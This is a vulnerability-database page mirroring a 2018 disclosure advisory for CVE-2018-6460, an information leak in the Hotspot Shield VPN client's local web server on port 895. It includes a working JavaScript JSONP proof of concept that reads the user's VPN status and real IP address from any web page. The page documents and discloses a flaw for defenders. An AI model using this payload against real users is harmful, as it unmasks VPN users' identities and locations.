Lucene search

K

Hotspot Shield - Information Disclosure

🗓️ 30 Jan 2018 00:00:00Reported by SecuriTeamType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 39 Views

Hotspot Shield information disclosure, CVE-2018-6460, web server vulnerability, sensitive information exposur

Show more
Related
Code
ReporterTitlePublishedViews
Family
exploitpack
Hotspot Shield - Information Disclosure
30 Jan 201800:00
exploitpack
CVE
CVE-2018-6460
31 Jan 201817:29
cve
The Hacker News
Researcher Claims Hotspot Shield VPN Service Exposes You on the Internet
7 Feb 201813:13
thn
NVD
CVE-2018-6460
31 Jan 201817:29
nvd
Prion
Code injection
31 Jan 201817:29
prion
ThreatPost
Hotspot Shield Vulnerability Could Reveal ‘Juicy’ Info About Users, Researcher Claims
7 Feb 201813:00
threatpost
Cvelist
CVE-2018-6460
31 Jan 201817:00
cvelist
## Vulnerability Summary
The following advisory describes a information disclosure found in Hotspot Shield.

Hotspot Shield “provides secure and private access to a free and open internet. Enabling access to social networks, sports, audio and video streaming, news, dating, gaming wherever you are.”

## Credit
An independent security researcher, Paulos Yibelo, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.

## Vendor response
“Thank you very much again for contacting us. The info is being reviewed and if there are any questions/comments, we’ll contact you by re-opening this ticket”

CVE: CVE-2018-6460

## Vulnerability details
The HotspotShiled product runs webserver with a static IP 127.0.0.1 and port 895.

The web server using JSONP and hosts sensitive information, including, configuration.

User controlled input is not sufficiently filterd, an unauthenticated attacker can send a POST request to /status.js with parameter func=$_APPLOG.Rfunc and extract sensitive information about the machine, including wheater the user is connected to VPN, to which VPN he/she is connected to what their real IP address.

## Proof of Concept

```
<head>
<script>
var $_APPLOG = function() { return 1; }
$_APPLOG.Rfunc = function(leak){
    alert(JSON.stringify(leak));
}
</script>
</head>
<script>
    var head = document.getElementsByTagName('head')[0];
    var script = document.createElement('script');
    script.id = 'jsonp';
    script.src = 'http://127.0.0.1:895/status.js?func=$_APPLOG.Rfunc&tm='+(new Date().getTime());
    head.appendChild(script);
</script>
```

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
30 Jan 2018 00:00Current
7.6High risk
Vulners AI Score7.6
CVSS25
CVSS37.5
EPSS0.015
39
.json
Report